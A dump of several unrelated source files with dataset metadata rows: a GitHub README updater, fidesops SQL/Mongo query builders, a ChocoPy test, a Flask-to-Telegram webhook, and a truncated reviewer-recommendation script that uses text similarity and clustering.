Union[None, list[Union[READMEIntegritySHA, Base64String]]]: This expects to return a list of READMEIntegritySHA and Base64 straight from b64decode or None.
"""
if action in GithubRunnerActions:
# We setup paths for HttpsURL with the use of these two varaibles.
user_repo = (
"{0}/{0}".format(self.envs["GITHUB_ACTOR"])
if self.envs["PROFILE_REPOSITORY"] is None
else "{0}".format(self.envs["PROFILE_REPOSITORY"])
)
repo_path: HttpsURL = HttpsURL(
"{0}/repos/{1}/{2}".format(
self.envs["GITHUB_API_URL"],
user_repo,
"readme"
if action is GithubRunnerActions.FETCH_README
else "contents/README.md",
)
)
# When making requests, we might want to loop whenever the data that we receive is malformed or have failed to send.
while True:
http_request: ClientResponse = await self._request(
repo_path, action, data=data if data is not None else None
)
try:
if http_request.ok:
suffix_req_cost: str = (
"Remaining Requests over Rate-Limit (%s/%s)"
% (
http_request.headers["X-RateLimit-Remaining"],
http_request.headers["X-RateLimit-Limit"],
)
)
# For this action, decode the README (base64) in utf-8 (str) then sterilized unnecessary newline.
if action is GithubRunnerActions.FETCH_README:
read_response: bytes = http_request.content.read_nowait()
serialized_response: dict = literal_eval(
read_response.decode("utf-8")
)
self.logger.info(
f"Github Profile ({user_repo}) README has been fetched. | {suffix_req_cost}"
)
return [
serialized_response["sha"],
Base64String(
serialized_response["content"].replace("\n", "")
),
]
# Since we commit and there's nothing else to modify, just output that the request was success.
if action is GithubRunnerActions.COMMIT_CHANGES and data is Base64String(data): # type: ignore # It explicitly wants to typecast `str`, which renders the condition false.
self.logger.info(
f"README Changes from ({user_repo}) has been pushed through! | {suffix_req_cost}"
)
return None
# If any of those conditions weren't met, retry again.
else:
self.logger.warning(
"Conditions were not met, continuing again after 3 seconds (as a penalty)."
)
await sleep(0.6)
continue
# Same for this case, but we assert that the data received is malformed.
except SyntaxError as e:
self.logger.warning(
f"Fetched Data is either incomplete or malformed. Attempting to re-fetch... | Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
)
await sleep(0.6)
continue
# Whenever we tried too much, we don't know if we are rate-limited, because the request will make the ClientResponse.ok set to True.
# So for this case, we special handle it by identifying the message.
except KeyError as e:
if serialized_response["message"].startswith(
"API rate limit exceeded"
):
msg: str = f"Request accepted but you are probably rate-limited by Github API. Did you keep on retrying or you are over-committing changes? | More Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, e)
terminate(ExitReturnCodes.RATE_LIMITED_EXIT)
else:
msg = f"The given value on `action` parameter is invalid! Ensure that the `action` is `{GithubRunnerActions}`!"
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
async def _request(
self,
url: HttpsURL,
action_type: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> ClientResponse:
"""
An inner-private method that handles the requests by using packaged header and payload, necessarily for requests.
Args:
url (HttpsURL): The URL String to make Request.
action_type (GithubRunnerActions): The type of action that is recently passed on `exec_api_actions().`
data (Optional[list[Union[READMEIntegritySHA, READMERawContent]]], optional): The argument given in `exec_api_actions()`, now handled in this method.. Defaults to None.
Returns:
ClientResponse: The raw response given by the aiohttp.REST_METHODS. Returned without modification to give the receiver more options.
"""
if action_type in GithubRunnerActions:
self.logger.info(
(
"Attempting to Fetch README from Github API <<< {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
if action_type is GithubRunnerActions.FETCH_README
else "Attempting to Commit Changes of README from Github API >>> {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
)
if GithubRunnerActions.COMMIT_CHANGES
else None
)
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
extra_contents: REQUEST_HEADER = {
"headers": {"Accept": "application/vnd.github.v3+json"},
"auth": BasicAuth(
self.envs["GITHUB_ACTOR"], self.envs["WORKFLOW_TOKEN"]
),
}
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
data_context: COMMIT_REQUEST_PAYLOAD = (
{
"content": READMEContent(bytes(data[1]).decode("utf-8")) if data is not None else None, # type: ignore # Keep in mind that the type-hint is already correct, I don't know what's the problem.]
"message": self.envs["COMMIT_MESSAGE"],
"sha": READMEIntegritySHA(str(data[0]))
if data is not None
else None,
"committer": {
"name": "Discord Activity Badge",
"email": "discord_activity@discord_bot.com",
},
}
if action_type is GithubRunnerActions.COMMIT_CHANGES
else {
"content": READMEContent(""),
"message": "",
"sha": READMEIntegritySHA(""),
"committer": {"name": "", "email": ""},
}
)
http_request: ClientResponse = await getattr(
self._api_session,
"get" if action_type is GithubRunnerActions.FETCH_README else "put",
)(url, json=data_context, allow_redirects=False, **extra_contents)
# todo: Make this clarified or confirmed. We don't have a case to where we can see this in action.
if http_request.ok:
return http_request
# ! Sometimes, we can exceed the rate-limit request per time. We have to handle the display error instead from the receiver of this request.
_resp_raw: ClientResponse = http_request # Supposed to be ClientResponse
_resp_ctx: dict = literal_eval(str(_resp_raw))
self.logger.debug(_resp_ctx)
terminate(ExitReturnCodes.EXCEPTION_EXIT)
else:
msg: str = f"An Enum invoked on `action` parameter ({action_type.name}) is invalid! This is probably an issue from the developer, please contact the developer as possible."
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, None)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
| 46.092937
| 234
| 0.583595
| 11,279
| 0.90967
| 0
| 0
| 0
| 0
| 10,758
| 0.867651
| 5,760
| 0.464554
|
3c9056dfb6354e5daafd7bffd768de97d7f13f54
| 11,790
|
py
|
Python
|
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
from abc import ABC, abstractmethod
from typing import Dict, Any, List, Set, Optional, Generic, TypeVar, Tuple
from sqlalchemy import text
from sqlalchemy.sql.elements import TextClause
from fidesops.graph.config import ROOT_COLLECTION_ADDRESS, CollectionAddress
from fidesops.graph.traversal import TraversalNode, Row
from fidesops.models.policy import Policy
from fidesops.util.collection_util import append
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
T = TypeVar("T")
class QueryConfig(Generic[T], ABC):
"""A wrapper around a resource-type dependant query object that can generate runnable queries and string representations."""
class QueryToken:
"""A placeholder token for query output"""
def __str__(self) -> str:
return "?"
def __repr__(self) -> str:
return "?"
def __init__(self, node: TraversalNode):
self.node = node
@property
def fields(self) -> List[str]:
"""Fields of interest from this traversal traversal_node."""
return [f.name for f in self.node.node.collection.fields]
def update_fields(self, policy: Policy) -> List[str]:
"""List of update-able field names"""
def exists_child(
field_categories: List[str], policy_categories: List[str]
) -> bool:
"""A not very efficient check for any policy category that matches one of the field categories or a prefix of it."""
if field_categories is None or len(field_categories) == 0:
return False
for policy_category in policy_categories:
for field_category in field_categories:
if field_category.startswith(policy_category):
return True
return False
policy_categories = policy.get_erasure_target_categories()
return [
f.name
for f in self.node.node.collection.fields
if exists_child(f.data_categories, policy_categories)
]
@property
def primary_keys(self) -> List[str]:
"""List of fields marked as primary keys"""
return [f.name for f in self.node.node.collection.fields if f.primary_key]
@property
def query_keys(self) -> Set[str]:
"""
All of the possible keys that we can query for possible filter values.
These are keys that are the ends of incoming edges.
"""
return set(map(lambda edge: edge.f2.field, self.node.incoming_edges()))
def filter_values(self, input_data: Dict[str, List[Any]]) -> Dict[str, Any]:
"""
Return a filtered list of key/value sets of data items that are both in
the list of incoming edge fields, and contain data in the input data set
"""
return {
key: value
for (key, value) in input_data.items()
if key in self.query_keys
and isinstance(value, list)
and len(value)
and None not in value
}
def query_sources(self) -> Dict[str, List[CollectionAddress]]:
"""Display the input sources for each query key"""
data: Dict[str, List[CollectionAddress]] = {}
for edge in self.node.incoming_edges():
append(data, edge.f2.field, edge.f1.collection_address())
return data
def display_query_data(self) -> Dict[str, Any]:
"""Data to represent a display (dry-run) query. Since we don't know
what data is available, just generate a query where the input identity
values are assumed to be present and singulur and all other values that
may be multiple are represented by a pair [?,?]"""
data = {}
t = QueryConfig.QueryToken()
for k, v in self.query_sources().items():
if len(v) == 1 and v[0] == ROOT_COLLECTION_ADDRESS:
data[k] = [t]
else:
data[k] = [
t,
QueryConfig.QueryToken(),
] # intentionally want a second instance so that set does not collapse into 1 value
return data
@abstractmethod
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy]
) -> Optional[T]:
"""Generate a retrieval query. If there is no data to be queried
(for example, if the policy identifies no fields to be queried)
returns None"""
@abstractmethod
def query_to_str(self, t: T, input_data: Dict[str, List[Any]]) -> str:
"""Convert query to string"""
@abstractmethod
def dry_run_query(self) -> Optional[str]:
"""dry run query for display"""
@abstractmethod
def generate_update_stmt(self, row: Row, policy: Optional[Policy]) -> Optional[T]:
"""Generate an update statement. If there is no data to be updated
(for example, if the policy identifies no fields to be updated)
returns None"""
class SQLQueryConfig(QueryConfig[TextClause]):
"""Query config that translates parameters into SQL statements."""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a retrieval query"""
filtered_data = self.filter_values(input_data)
if filtered_data:
clauses = []
query_data: Dict[str, Tuple[Any, ...]] = {}
field_list = ",".join(self.fields)
for field_name, data in filtered_data.items():
if len(data) == 1:
clauses.append(f"{field_name} = :{field_name}")
query_data[field_name] = (data[0],)
elif len(data) > 1:
clauses.append(f"{field_name} IN :{field_name}")
query_data[field_name] = tuple(set(data))
else:
# if there's no data, create no clause
pass
if len(clauses) > 0:
query_str = f"SELECT {field_list} FROM {self.node.node.collection.name} WHERE {' OR '.join(clauses)}"
return text(query_str).params(query_data)
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a SQL update statement in the form of a TextClause"""
update_fields = self.update_fields(policy)
update_value_map = {k: None for k in update_fields}
update_clauses = [f"{k} = :{k}" for k in update_fields]
pk_clauses = [f"{k} = :{k}" for k in self.primary_keys]
for pk in self.primary_keys:
update_value_map[pk] = row[pk]
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update statement for {self.node.address}"
)
return None
query_str = f"UPDATE {self.node.address.collection} SET {','.join(update_clauses)} WHERE {','.join(pk_clauses)}"
logger.info("query = %s, params = %s", query_str, update_value_map)
return text(query_str).params(update_value_map)
def query_to_str(self, t: TextClause, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
def transform_param(p: Any) -> str:
if isinstance(p, str):
return f"'{p}'"
return str(p)
query_str = str(t)
for k, v in input_data.items():
if len(v) == 1:
query_str = re.sub(f"= :{k}", f"= {transform_param(v[0])}", query_str)
elif len(v) > 0:
query_str = re.sub(f"IN :{k}", f"IN { tuple(set(v)) }", query_str)
return query_str
def dry_run_query(self) -> Optional[str]:
query_data = self.display_query_data()
text_clause = self.generate_query(query_data, None)
if text_clause is not None:
return self.query_to_str(text_clause, query_data)
return None
MongoStatement = Tuple[Dict[str, Any], Dict[str, Any]]
"""A mongo query is expressed in the form of 2 dicts, the first of which represents
the query object(s) and the second of which represents fields to return.
e.g. 'collection.find({k1:v1, k2:v2},{f1:1, f2:1 ... })'. This is returned as
a tuple ({k1:v1, k2:v2},{f1:1, f2:1 ... }).
An update statement takes the form
collection.update_one({k1:v1},{k2:v2}...}, {$set: {f1:fv1, f2:fv2 ... }}, upsert=False).
This is returned as a tuple
({k1:v1},{k2:v2}...}, {f1:fv1, f2: fv2 ... }
"""
class MongoQueryConfig(QueryConfig[MongoStatement]):
"""Query config that translates paramters into mongo statements"""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
def transform_query_pairs(pairs: Dict[str, Any]) -> Dict[str, Any]:
"""Since we want to do an 'OR' match in mongo, transform queries of the form
{A:1, B:2} => "{$or:[{A:1},{B:2}]}".
Don't bother to do this if the pairs size is 1
"""
if len(pairs) < 2:
return pairs
return {"$or": [dict([(k, v)]) for k, v in pairs.items()]}
if input_data:
filtered_data = self.filter_values(input_data)
if filtered_data:
field_list = {field_name: 1 for field_name in self.fields}
query_pairs = {}
for field_name, data in filtered_data.items():
if len(data) == 1:
query_pairs[field_name] = data[0]
elif len(data) > 1:
query_pairs[field_name] = {"$in": data}
else:
# if there's no data, create no clause
pass
query_fields, return_fields = (
transform_query_pairs(query_pairs),
field_list,
)
return query_fields, return_fields
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
"""Generate a SQL update statement in the form of Mongo update statement components"""
update_fields = self.update_fields(policy)
update_clauses = {k: None for k in update_fields}
pk_clauses = {k: row[k] for k in self.primary_keys}
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update for {self.node.address}"
)
return None
return pk_clauses, {"$set": update_clauses}
def query_to_str(self, t: MongoStatement, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
query_data, field_list = t
db_name = self.node.address.dataset
collection_name = self.node.address.collection
return f"db.{db_name}.{collection_name}.find({query_data}, {field_list})"
def dry_run_query(self) -> Optional[str]:
data = self.display_query_data()
mongo_query = self.generate_query(self.display_query_data(), None)
if mongo_query is not None:
return self.query_to_str(mongo_query, data)
return None
| 38.655738
| 128
| 0.598473
| 10,694
| 0.90704
| 0
| 0
| 1,459
| 0.123749
| 0
| 0
| 3,552
| 0.301272
|
3c90a121b4d915c2524981fd84ae09376497b28d
| 91
|
py
|
Python
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 5
|
2020-05-13T03:47:43.000Z
|
2022-01-20T04:52:42.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 4
|
2020-05-18T01:06:15.000Z
|
2020-06-12T19:33:14.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-rs
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | null | null | null |
print("debug_print: 42")
print("")
print("Hello")
#!
#<->#
#debug_print: 42
#
#Hello
#<->#
| 9.1
| 24
| 0.56044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 61
| 0.67033
|
3c92d76b2ecb583dc3d4b1217c00aa46b1e963fb
| 710
|
py
|
Python
|
src/catchbot/routes.py
|
grihabor/catch-hook-telegram-bot
|
1f3c6a5d56d5ebba3d4620b532acde2ed734a75e
|
[
"MIT"
] | null | null | null |
src/catchbot/routes.py
|
grihabor/catch-hook-telegram-bot
|
1f3c6a5d56d5ebba3d4620b532acde2ed734a75e
|
[
"MIT"
] | 4
|
2018-02-21T11:25:49.000Z
|
2018-06-23T15:51:51.000Z
|
src/catchbot/routes.py
|
grihabor/catch-hook-telegram-bot
|
1f3c6a5d56d5ebba3d4620b532acde2ed734a75e
|
[
"MIT"
] | null | null | null |
from flask import request, redirect
from .message import create_message_for_user
from .tasks import send_message_to_bot
def _hook(chat_id, hash):
if not request.is_json:
return 'Data must be in json format', 400
json_obj = request.get_json(cache=False)
msg = create_message_for_user(request.headers, json_obj)
send_message_to_bot.delay(chat_id, msg)
return 'OK', 200
def _root():
return redirect('http://t.me/catch_web_hook_bot', code=302)
def register_routes(app):
@app.route('/hooks/<chat_id>/<hash>', methods=['POST'])
def hook(chat_id, hash):
return _hook(chat_id, hash)
@app.route('/', methods=['GET'])
def root():
return _root()
| 22.903226
| 63
| 0.683099
| 0
| 0
| 0
| 0
| 191
| 0.269014
| 0
| 0
| 104
| 0.146479
|
3c97c75c9954f8ab840e506c7e164088d7c58e96
| 17,208
|
py
|
Python
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation-Based-on-Scholarly-Activity-Assessment
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | 2
|
2020-05-25T08:20:54.000Z
|
2020-05-25T08:21:02.000Z
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding:utf-8 -*-
#import python packages
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import silhouette_samples
from sklearn.cluster import KMeans
from sklearn.utils.testing import ignore_warnings
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import *
from sklearn.cluster import *
from gensim.summarization.summarizer import summarize
from gensim.summarization import keywords
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from operator import itemgetter
from operator import attrgetter
from pyjarowinkler import distance
from collections import Counter
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import nltk
import math
import time
import csv
import sys
import re
import io
import os
start_time = time.time()
#전처리 함수 정의부
def remove_string_special_characters(s):
stripped = re.sub('[^a-zA-z\s]', '', s)
stripped = re.sub('_', '', stripped)
stripped = re.sub('\s+', ' ', stripped)
stripped = stripped.strip()
if stripped != '':
return stripped.lower()
#클래스 정렬 함수 정의부
def multisort(xs, specs):
for key, reverse in reversed(specs):
xs.sort(key=attrgetter(key), reverse=reverse)
return xs
#속성집합 추출 함수 정의부
#키워드 매개변수(입력csv path, 속선집합 포함 출력csv path, 추출할 단어 수)
def extractive_keyword(path,database_update_path,extract_word_num=20):
reviewee = pd.read_csv(path, encoding='latin1')
count,temp = len(reviewee),[]
for i in range(count):
temp_intro = reviewee['submitter_intro'][i]
temp_sent = summarize(reviewee['submitter_intro'][i], ratio=0.05)
textrank_textsent_mearge = ''
textrank_text,textrank_sent = '',''
for c in (keywords(temp_intro, words=extract_word_num-(extract_word_num//4), lemmatize=True).split('\n')):
textrank_text += (c+ " ")
for cc in (keywords(temp_sent, words=(extract_word_num//4), lemmatize=True).split('\n')):
textrank_sent += (cc+ " ")
temp.append(textrank_text + " " + textrank_sent)
reviewee['submitter_attribute']=temp
reviewee.iloc[:,1:].to_csv(database_update_path)
#return type : pandas.dataframe
return reviewee
#전문성 검사 함수 정의부
#키워드 매개변수(입력csv path, 투고원고 DataFrame, i번째 투고 원고, 추천할 심사자 수, 실루엣값 계산 범위 지정)
def professionalism(path,extractive_keyword_result,reviewee_index,top_limit,silhouette_range=25):
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
temp_id,temp_doi = 0,''
temp_title = reviewee.loc[index]['submitter_title']
temp_attribure = reviewee.loc[index]['submitter_attribute']
reviewer_attr = pd.read_csv(path, encoding='latin1')
reviewer_attr.loc[-1]=[str(temp_id),temp_doi,temp_title,temp_attribure]
reviewer_attr.index += 1
reviewer_attr.sort_index(inplace=True)
reviewer=reviewer_attr['reviewer_paper_attribure']
jac_token,jac,cos,avg=[],[],[],[]
for t in range(len(reviewer)):
jac_token.append(set(nltk.ngrams((nltk.word_tokenize(reviewer[t])), n=1)))
for j in range(len(reviewer)):
jac.append(1-(nltk.jaccard_distance(jac_token[0], jac_token[j])))
count_vectorizer = CountVectorizer(stop_words='english')
count_vectorizer = CountVectorizer()
sparse_matrix = count_vectorizer.fit_transform(reviewer)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=[i for i in reviewer])
cos=cosine_similarity(df, df)[0].tolist()
for i in range(len(jac)):
avg.append((jac[i] + cos[i])/2)
reviewer_attr['sim']=avg
vectorizer = TfidfVectorizer(stop_words='english')
Y = vectorizer.fit_transform(reviewer)
YY = Y.toarray()
X = StandardScaler().fit_transform(YY)
top_avg,top_k=0,0
silhouette,k_mean,k_mean2=[],[],[]
for i in range(2,silhouette_range+1,1):
model = SpectralClustering(n_clusters=i, affinity="nearest_neighbors")
cluster_labels = model.fit_predict(X)
sample_silhouette_values = silhouette_samples(YY, cluster_labels)
silhouette_avg = sample_silhouette_values.mean()
if top_avg < silhouette_avg:
top_avg = silhouette_avg
top_k = i
silhouette_temp=[]
silhouette_temp.append('k=' + str(i) + '일때 : ')
silhouette_temp.append(silhouette_avg)
silhouette.append(silhouette_temp)
model = KMeans(n_clusters=(top_k), init='k-means++', max_iter=100, n_init=1)
model.fit(Y)
for k in range(len(reviewer)):
YYY = vectorizer.transform([reviewer[k]])
prediction = model.predict(YYY)
k_mean.append(prediction)
for k in range(len(reviewer)):
k_mean2.append(int(k_mean[k][0]))
reviewer_attr['k_mean']=k_mean2
kmean_reviewer = reviewer_attr[reviewer_attr['k_mean'] == reviewer_attr.loc[0]['k_mean']]
kmean_reviewer2 = kmean_reviewer.sort_values(by=['sim'], axis=0, ascending=False)
professionalism=kmean_reviewer2.iloc[1:top+1]
#return type : pandas.dataframe
return professionalism
#이해관계 검사 함수 정의부
#키워드 매개변수(심사후보자_공저자csv path, 심사후보자_정보csv path, 심사후보자_공저자네트워크csv path,전문성검사결과_DataFrame, 투고원고_DataFrame, i번째 투고 원고, 추천할 심사자 수, 심사후보자_공저자네트워크_곱셈횟수)
def interest(co_author_path, reviewer_information_path, co_author_network_path, professionalism_result, extractive_keyword_result, reviewee_index,top_limit,matrix_multifly_count):
crash_result,reviewee_list=[],[]
reviewer_list1,reviewer_co_list=[],[]
path1=co_author_path
path2=reviewer_information_path
network_path=co_author_network_path
temp = professionalism_result
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
multifly=matrix_multifly_count
co_author_csv = pd.read_csv(path1, encoding='latin1')
co_author_df = co_author_csv.merge(temp, on=['reviewer_orcid'])
tt = co_author_df.iloc[:]['reviewer_name'].tolist()
reviewee_list=[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+5
if reviewee.loc[index][col_index] != 0:
reviewee_list.append(reviewee.loc[index][col_index])
reviewer_list,reviewer_co_list=[],[]
for j in range(len(co_author_csv)):
co_list_temp=[]
reviewer_list.append(co_author_csv['reviewer_name'][j])
co_list_temp.append(co_author_csv['reviewer_name'][j])
for i in range(1,11):
col_index = (i*2)
if co_author_csv.loc[j][col_index] != 0:
co_list_temp.append(co_author_csv.loc[j][col_index])
reviewer_co_list.append(co_list_temp)
co_rel_df = pd.DataFrame(
columns=[i for i in reviewer_list],
index=[j for j in reviewee_list])
for j in range(len(reviewee_list)):
for i in range(len(reviewer_list)):
for k in range(len(reviewer_co_list[i])):
if reviewee_list[j] == reviewer_co_list[i][k]:
co_rel_df.iat[j, i] = 1
co_rel_df.fillna(0, inplace=True)
try :
matrix_df = pd.read_csv(co_author_network_path, encoding='latin1', index_col=0)
except FileNotFoundError :
index = co_author_csv['reviewer_orcid'].index[co_author_csv['reviewer_orcid'].apply(np.isnan)]
df_index = co_author_csv.index.values.tolist()
nan_range =[df_index.index(i) for i in index]
try :
import_csv2=co_author_csv.iloc[:nan_range[0]]
id_list=import_csv2['reviewer_name'].tolist()
except IndexError :
import_csv2=co_author_csv
id_list = co_author_csv.iloc[:]['reviewer_name'].tolist()
matrix_df = pd.DataFrame(
columns=[i for i in id_list],
index=[j for j in id_list])
for i in range(len(id_list)):
for j in range(len(id_list)):
index=[1,]
index.extend([(j*2) for j in range(1,11)])
for k in range(11):
if (id_list[i]) == (import_csv2.iloc[j][index[k]]) :
print(id_list[i], import_csv2.iloc[j][index[k]])
print(i)
matrix_df.iat[j, i] = 1
matrix_df.iat[i, j] = 1
if str(id_list[i]) == str(id_list[j]):
matrix_df.iat[i, j] = 0
matrix_df.fillna(0, inplace=True)
matrix_df.to_csv(co_author_network_path)
for i in range(multifly):
matrix_df = matrix_df.dot(matrix_df)
a=matrix_df.values
b=co_rel_df.values
aaa = b.dot(a)
aaa2=pd.DataFrame(data=aaa,
index=(co_rel_df.index).tolist(),
columns=(matrix_df.index).tolist())
a_series = (aaa2 != 0).any(axis=1)
new_df = aaa2.loc[a_series]
ccc=(new_df.index).tolist()
ddd=co_author_df['reviewer_name'].tolist()
reviewer_list1 = list(set(ddd).difference(ccc))
co_inst_csv = pd.read_csv(path2, encoding='latin1')
co_inst_df = co_inst_csv.merge(temp, on=['reviewer_orcid'])
reviewee_list2,reviewer_list2,reviewer_inst_list=[],[],[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+6
if reviewee.loc[index][col_index] != 0:
reviewee_list2.append(reviewee.loc[index][col_index])
for j in range(len(co_inst_df)):
inst_list_temp=[]
reviewer_list2.append(co_inst_df['reviewer_name'][j])
reviewer_inst_list.append(co_inst_df['reviewer_institution'][j])
inst_rel_df = pd.DataFrame(
columns=[i for i in reviewee_list2],
index=[j for j in reviewer_list2])
for i in range(len(reviewee_list2)):
for j in range(len(reviewer_list2)):
if reviewee_list2[i] == reviewer_inst_list[j]:
inst_rel_df.iat[j, i] = 1
for i in range(len(reviewer_list2)):
if (inst_rel_df.sum(axis=1)[i]) > 0:
reviewer_list2.remove(inst_rel_df.index[i])
crash_result.append(inst_rel_df.index[i])
reviewer_list1,reviewer_list2 = reviewer_list1[0:top*2],reviewer_list2[0:top*2]
reviewer_rank = list(set(reviewer_list1).intersection(reviewer_list2))
id_index,sim_index,count_index=[],[],[]
reviewer_rank = pd.DataFrame({'reviewer_name': reviewer_rank})
for i in range(len(reviewer_rank)):
for j in range(len(co_author_df)):
if reviewer_rank.loc[i]['reviewer_name'] == co_author_df.loc[j]['reviewer_name'] :
id_index.append(int(co_author_df.iloc[j]['reviewer_orcid']))
sim_index.append(co_author_df.iloc[j]['sim'])
if reviewer_rank.loc[i]['reviewer_name'] == co_inst_df.loc[j]['reviewer_name'] :
count_index.append(co_inst_df.iloc[j]['count'])
reviewer_rank['reviewer_orcid']=id_index
reviewer_rank['sim']=sim_index
reviewer_rank['count']=count_index
#return type : pandas.dataframe
return reviewer_rank
#csv 저장 함수 정의부
#키워드 매개변수(save_path, 투고원고_DataFrame, 전문성검사_DataFrame, i번째 투고 원고, 추천할 심사자 수)
def save_csv(output_path,extractive_keyword_result,professionalism_result,reviewee_index,top_limit):
path=output_path
reviewee=extractive_keyword_result
reviewer_rank_name=professionalism_result
ee_num=reviewee_index
top=top_limit
export_data=[]
for i in range((top*2)):
temp=[]
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_title'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['date'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_orcid'])
temp.append(reviewer_rank_name.iloc[i]['sim'])
temp.append(reviewer_rank_name.iloc[i]['count'])
export_data.append(temp)
try :
export_csv = pd.read_csv(path,index_col=0)
except FileNotFoundError :
export_csv = pd.DataFrame([],columns=[
'submitter_title','date','submitter_name','reviewer_name','reviewer_orcid','sim','count'])
for i in range(len(export_data)):
export_csv.loc[len(export_csv)] = export_data[i]
export_csv.to_csv(path)
#균등할당 함수 정의부
#키워드 매개변수(입력 path)
def equl_distribution(input_csv_path, output_csv_path):
final_list=[]
export_csv2 = pd.read_csv(input_csv_path,index_col=0)
class Paper:
def __init__(self, title, date, submitter, reviwer_name, reviwer_orcid, sim, count):
self.title = title
self.date = date
self.submitter = submitter
self.reviwer_name = reviwer_name
self.reviwer_orcid = reviwer_orcid
self.sim = sim
self.count = count
def __repr__(self):
return repr((self.title, self.date, self.submitter, self.reviwer_name, self.reviwer_orcid, self.sim, self.count))
papers,objs=[export_csv2.iloc[i].tolist() for i in range(len(export_csv2))],[]
for paper in papers:
objs.append(Paper(*paper))
o = (multisort(list(objs), (('date', False), ('sim', True))))
for i in range(0,len(export_csv2),6) :
temp_list=[]
for t in range(6):
if len(temp_list) == 3:
break
else :
temp = i + t
if (o[temp].count) < 3 :
o[temp].count += 1
for j in range(0+temp, len(export_csv2)) :
if (o[temp].reviwer_name == o[j].reviwer_name) :
o[j].count += 1
o[temp].count -= 1
temp_list.append(o[temp])
final_list.extend(temp_list)
final=pd.DataFrame(final_list,columns=['result'])
final.to_csv(output_csv_path)
#디폴트 실행 함수 정의부
def main():
#투고원고에 대한 속성집합 추출
#키워드 매개변수(입력csv path, 속선집합 포함 출력csv path, 추출할 단어 수)
reviewee=extractive_keyword(path='../reviewee/submitter_10.csv',
database_update_path='../reviewee/reviwupdate.csv',
extract_word_num=20)
#return type : pandas.dataframe
#투고원고 수 만큼의 검사세트 진행
for i in range(len(reviewee)):
#전문성검사
#키워드 매개변수(입력csv path, 투고원고 DataFrame, i번째 투고 원고, 추천할 심사자 수, 실루엣값 계산 범위 지정)
reviewer=professionalism(path='../reviewer_pool/reviewer_attribute_5.csv',
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=10,
silhouette_range=25)
#return type : pandas.dataframe
